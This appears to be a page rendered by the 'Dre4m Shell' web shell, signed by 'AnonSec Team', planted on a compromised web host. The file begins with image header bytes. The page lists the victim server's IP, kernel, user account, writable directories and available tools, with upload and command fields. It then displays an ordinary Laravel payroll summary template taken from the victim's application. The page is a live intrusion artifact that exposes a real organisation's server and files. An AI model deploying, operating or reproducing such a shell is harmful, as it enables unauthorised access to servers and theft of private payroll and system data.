ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.139.104.48
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/consolidated/newpayroll/resources/views/auditSummaryReport/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/consolidated/newpayroll/resources/views/auditSummaryReport/summary.blade.php
@extends('layouts.layout')
@section('pageTitle')
Payroll Report
@endsection
@section('content')

  <div class="box-body">
    <div class="row">
      <div class="col-md-12">
        <p class="text-center">SUMMARY OF {{ $summary[0]->month }} {{ $summary[0]->year }} SALARY</p>
        <table border="1" width="900px" cellspacing="6">
          <th>S/No</th>
          <th>Division</th>
          <th>Gross Pay</th>
          <th>Total Deduction</th>
          <th>Total Net Pay</th>
          <?php $i = 1;?>
          @foreach($summary as $s)
          <tr>
            <td><?php echo $i; $i++; ?></td>
            <td>{{$s->division}}</td>
            <td align="right">{{ number_format($s->grosspay, 2, '.', ',') }}</td>
            <td align="right">{{ number_format($s->grosspay-$s->totalEmolu, 2, '.', ',') }}</td>
            <td align="right">{{ number_format($s->totalEmolu, 2, '.', ',') }}</td>
          </tr>
          @endforeach
        </table>
      </div>     
    </div>
  </div><!-- /.col -->
</div><!-- /.row -->

@endsection
@section('styles')
<style type="text/css">
  p.text-center { font-size: 18px; font-weight: bolder;
  }
  table { font-size: 16px; border: solid thin 1px #000; }
  td, th { padding: 1px 4px }
</style>
@endsection

@section('styles')
<style type="text/css" media="print">
  /*  body
    {
        display: none;
        visibility: hidden;
    }*/
</style>
@endsection
@section('scripts')

<script type="text/javascript" language="javascript">
      /*  $(function() {
            $(this).bind("contextmenu", function(e) {
                e.preventDefault();
            });
        }); */
</script>
<script type="text/javascript">
   /* $(document).ready(function(){
    
        function copyToClipboard() {
  // Create a "hidden" input
  var aux = document.createElement("input");
  // Assign it the value of the specified element
  aux.setAttribute("value", "Você não pode mais dar printscreen. Isto faz parte da nova medida de segurança do sistema.");
  // Append it to the body
  document.body.appendChild(aux);
  // Highlight its content
  aux.select();
  // Copy the highlighted text
  document.execCommand("copy");
  // Remove it from the body
  document.body.removeChild(aux);
  //ert("Print screen desabilitado.");
}

$(window).keyup(function(e){
  if(e.keyCode == 44){
    copyToClipboard();
  }
}); 




    });*/
</script>

@endsection



Anon7 - 2022
AnonSec Team